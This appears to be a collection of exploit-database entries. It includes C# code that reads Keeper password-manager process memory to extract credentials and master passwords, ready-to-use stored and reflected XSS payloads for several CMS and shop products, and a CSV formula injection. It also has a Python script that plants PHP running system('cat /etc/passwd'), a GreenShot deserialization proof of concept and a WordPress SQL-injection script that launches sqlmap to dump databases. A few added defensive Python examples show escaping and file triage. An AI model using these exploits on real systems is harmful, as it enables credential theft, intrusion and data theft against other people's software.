        {
            string commandline = GetCommandLine(process);
            if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
            {
                Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                Console.WriteLine("->Searching...\n");
                IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                IntPtr address = new IntPtr(0x10000000000);
                MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                {
                    if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                    {
                        byte[] buffer = new byte[(int)memInfo.RegionSize];
                        if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                        {
                            string text = Encoding.ASCII.GetString(buffer);
                            extract_credentials(text);
                            extract_master(text);
                            extract_account(text);
                        }
                    }

                    address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                }

                CloseHandle(processHandle);

            }

        }

    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll")]
    public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }
}
            
# Exploit Title: RosarioSIS 10.8.4 - CSV Injection
# Google Dork:NA
# Exploit Author: Ranjeet Jaiswal
# Vendor Homepage: https://www.rosariosis.org/
# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
# Affected Version: 10.8.4
# Category: WebApps
# Tested on: Windows 10
# 
#
# 1. Vendor Description:
#
# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems.
#
# 2. Technical Description:
#
# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application version 10.8.4 allows malicious users to execute a malicious payload in CSV/XLS files and redirect an authorized user to a malicious website.

#
# 3. Proof Of Concept:

# 3.1. Proof of Concept for CSV injection.

# Steps to reproduce.
Step 1: Log in to RosarioSIS 10.8.4
Step 2: Go to the Periods page
Step 3: Add a CSV injection redirection payload such as =HYPERLINK("https://www.google.com","imp") in the Title field
Step 4: Click the Save button to save the data.
Step 5: Go to the Export tab and export the data
Step 6: When a user opens the downloaded Periods.xls file, they will see a redirection hyperlink.
Step 7: When the user clicks the link, they will be redirected to the attacker's or a malicious website.



# 4. Solution:
 Upgrade to the latest release of RosarioSIS.
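Added here as a defensive example, not part of the advisory: a Python export helper that neutralises cells like the =HYPERLINK(...) payload above before they reach a CSV/XLS download. The period rows are constructed sample data; RosarioSIS's own export code is not shown.

```python
import csv
import io

# Leading characters that make Excel / LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _is_plain_number(text: str) -> bool:
    """Ordinary numbers such as -5 or +3.5 are left alone; only text is prefixed."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralise_cell(value) -> str:
    """Return a cell value that a spreadsheet will treat as literal text."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS) and not _is_plain_number(text):
        # A leading apostrophe forces text mode. Some viewers display it
        # literally; that is the accepted trade-off for exporting untrusted data.
        text = "'" + text
    return text


def export_rows(header, rows) -> str:
    """Write header + rows as CSV with every field quoted and neutralised.

    csv.QUOTE_ALL also keeps delimiters and embedded quotes inside one cell,
    so a value cannot spill into a neighbouring column or row.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralise_cell(v) for v in row])
    return buf.getvalue()


# Constructed sample: one legitimate period, the advisory's payload stored in
# the Title field, and a harmless title that happens to start with "-".
SAMPLE_PERIODS = [
    (1, "Period 1", "08:00"),
    (2, '=HYPERLINK("https://www.google.com","imp")', "09:00"),
    (3, "-10 minutes late", "10:00"),
]


if __name__ == "__main__":
    print(export_rows(["id", "title", "start"], SAMPLE_PERIODS))
```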
            
HireHackking

Perch v3.2 - Stored XSS

Exploit Title: Perch v3.2 - Stored XSS
Application: Perch Cms
Version: v3.2
Bugs:  XSS
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Log in to account
2. go to http://localhost/perch_v3.2/perch/core/settings/
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. Go to the SVG file (http://localhost/perch_v3.2/perch/resources/malas.svg)
            
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog 
#Version: v3.9
#Bugs:  RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"


#login 
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
login_req=session.post(login_url,headers=headers,data=login_data)

if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login problem.')
    exit()
#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

#rename

rename_req=session.get(rename_url)

#poc
poc_req=session.get(poc_url)
print(poc_req.text)


#youtube poc video - https://youtu.be/nn7hieGyCFs
            
# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Author: CraCkEr aka (skalvin)
# Date: 22/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moodatingscript.com/
# Software Link: https://demo.moodatingscript.com/home
# Version: 1.2
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and
can perform a wide variety of actions, such as stealing the victim's session token or login credentials.



Path: /matchmakings/question

URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
https://website/matchmakings/question[XSS]?number=


Path: /friends

URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
https://website/friends[XSS]/ajax_invite?mode=model


Path: /friends/ajax_invite

URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages

URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users

URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
https://website/user[XSS]/view/108?tab=activity

Path: /users/view

URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
https://website/users/view[XSS]/108?tab=activity


Path: /find-a-match

URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0


[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6


[-] Done
            
# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested

# Description:
Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionality under the create asset section.

#Steps to Reproduce

User needs to log in to the application and follow the steps below:

1. Log in to the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill in all other details (please note that not all the text fields are vulnerable to XSS, as they have output encoding)
4. Create an SVG file, say xss.svg, with the contents below
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

5. In the File upload section, upload the above SVG file and submit
6. Now browse to the uploaded SVG file directly, say xss.svg
7. Go to the SVG file (http://URL/perch/resources/xss.svg), or view all Assets and view the image
8. One can see that we got an XSS alert.
            
# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com


XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]



// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
        </div>
[...]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Steps to Reproduce:

1. Browse to My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]
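Added example for XSS #1 above, not part of the advisory: the response shows the promo code echoed into an unquoted value= attribute with no encoding. The two renderers below reproduce that markup and the hardened form (quoted attribute plus html.escape with quote=True), and a small html.parser walk shows what a browser would make of each. The templates are reconstructed from the response fragment, not the product's own code.

```python
import html
from html.parser import HTMLParser

# The payload from the advisory's request (promo_code parameter, URL-decoded).
PAYLOAD = 'TEST"><script>alert(`XSS`)</script>'


def render_vulnerable(promo_code: str) -> str:
    """Mirrors the affected markup: value is neither quoted nor encoded."""
    return ('<input id="promo_code" class="form-control input-sm" type="text" '
            f'name="promo_code" size="25" value={promo_code}" title="Promo code">')


def render_hardened(promo_code: str) -> str:
    """Quote the attribute AND encode & < > \" ' so it cannot be closed early."""
    safe = html.escape(promo_code, quote=True)
    return ('<input id="promo_code" class="form-control input-sm" type="text" '
            f'name="promo_code" size="25" value="{safe}" title="Promo code">')


class _TagCollector(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def browser_view(markup: str):
    """Return (start tags seen, input values seen) for a markup fragment."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_values


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        tags, values = browser_view(render(PAYLOAD))
        print(f"{name}: tags={tags} values={values}")
```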
            
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty
            
# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: Hikari Software Team
# Vendor Homepage: https://www.hikashop.com/
# Software Link: https://demo.hikashop.com/index.php/en/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
# Version: 4.7.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob



## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and
can perform a wide variety of actions, such as stealing the victim's session token or login credentials.



Path: /index.php

GET parameter 'from_option' is vulnerable to RXSS

https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103


Path: /index.php

GET parameter 'from_ctrl' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103


Path: /index.php

GET parameter 'from_task' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103


Path: /index.php

GET parameter 'from_itemid' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]


[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46



[-] Done
            
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to insecure object deserialization in its custom *.greenshot format.
# A stream of .NET objects is serialized and insecurely deserialized when a *.greenshot file is opened with the software.
# On a default install the *.greenshot file extension is associated with the program, so double-clicking a *.greenshot file
# will lead to arbitrary code execution.
#
# Generate the payload. You need ysoserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw
#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines create a PNG file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61 
$font = new-object System.Drawing.Font Consolas,24 
$brushBg = [System.Drawing.Brushes]::Green 
$brushFg = [System.Drawing.Brushes]::Black 
$graphics = [System.Drawing.Graphics]::FromImage($bmp) 
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) 
$graphics.Dispose() 
$bmp.Save($filename) 

# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline 
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item $filename
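Added triage example, not part of the advisory: a parser for the file layout the PowerShell above writes (PNG bytes, serialized payload, 8-byte little-endian length, ASCII "Greenshot01.02" signature). It assumes that layout holds for every file; since a legitimate .greenshot also carries a BinaryFormatter stream, the useful output for a defender is the list of .NET names referenced in the payload, to compare against what Greenshot itself writes. The sample file is constructed and its payload is not a real object graph.

```python
import re
import struct

SIGNATURE = b"Greenshot01.02"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Leading bytes of a .NET BinaryFormatter stream (SerializationHeaderRecord:
# RecordType 0, RootId 1, HeaderId -1, MajorVersion 1, MinorVersion 0).
BINARY_FORMATTER_HEADER = bytes.fromhex("0001000000ffffffff0100000000000000")


def parse_greenshot(data: bytes) -> dict:
    """Split a file laid out as PNG | payload | int64 LE length | signature."""
    if not data.endswith(SIGNATURE):
        raise ValueError("missing Greenshot01.02 trailer signature")
    body = data[: -len(SIGNATURE)]
    if len(body) < 8:
        raise ValueError("file too short to hold a length field")
    (length,) = struct.unpack("<q", body[-8:])
    body = body[:-8]
    if length < 0 or length > len(body):
        raise ValueError(f"payload length {length} is inconsistent with file size")
    split = len(body) - length
    return {"png": body[:split], "payload": body[split:], "length": length}


def dotnet_names(payload: bytes) -> list:
    """Dotted identifiers (type and assembly names) visible in the stream."""
    found = re.findall(rb"[A-Za-z0-9_]+(?:\.[A-Za-z0-9_]+)+", payload)
    return sorted({m.decode("ascii") for m in found})


def analyse(data: bytes) -> dict:
    """Trailer sanity, BinaryFormatter detection and referenced .NET names."""
    try:
        parts = parse_greenshot(data)
    except ValueError as exc:
        return {"error": str(exc)}
    payload = parts["payload"]
    return {
        "png_ok": parts["png"].startswith(PNG_MAGIC),
        "payload_len": parts["length"],
        "binaryformatter": payload.startswith(BINARY_FORMATTER_HEADER),
        "names": dotnet_names(payload),
    }


# Constructed sample payload: the BinaryFormatter header followed by the type
# name the WindowsIdentity gadget named above would reference. Not a real stream.
SAMPLE_PAYLOAD = (BINARY_FORMATTER_HEADER
                  + b"\x00System.Security.Principal.WindowsIdentity\x00")


def build_sample() -> bytes:
    """Assemble a file in the same order as the PowerShell proof of concept."""
    png = PNG_MAGIC + b"\x00\x00\x00\x00IEND\xaeB`\x82"  # minimal stand-in PNG
    return png + SAMPLE_PAYLOAD + struct.pack("<q", len(SAMPLE_PAYLOAD)) + SIGNATURE


if __name__ == "__main__":
    print(analyse(build_sample()))
```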
            
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>
            
# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob



## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and
can perform a wide variety of actions, such as stealing the victim's session token or login credentials.



Path: /product-variants

GET parameter 'keyword' is vulnerable to RXSS

https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925


[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2



[-] Done
            
#!/usr/bin/python3

# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636


from datetime import datetime
import os
import requests
import json

# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'

banner = '''

 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
		Exploit Author: Lukas Kinneberg

'''

print(banner)

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

print('[*] Payload for SQL-Injection:')

# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '


# SQLMAP Printout
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
            
# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501



#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) attack.

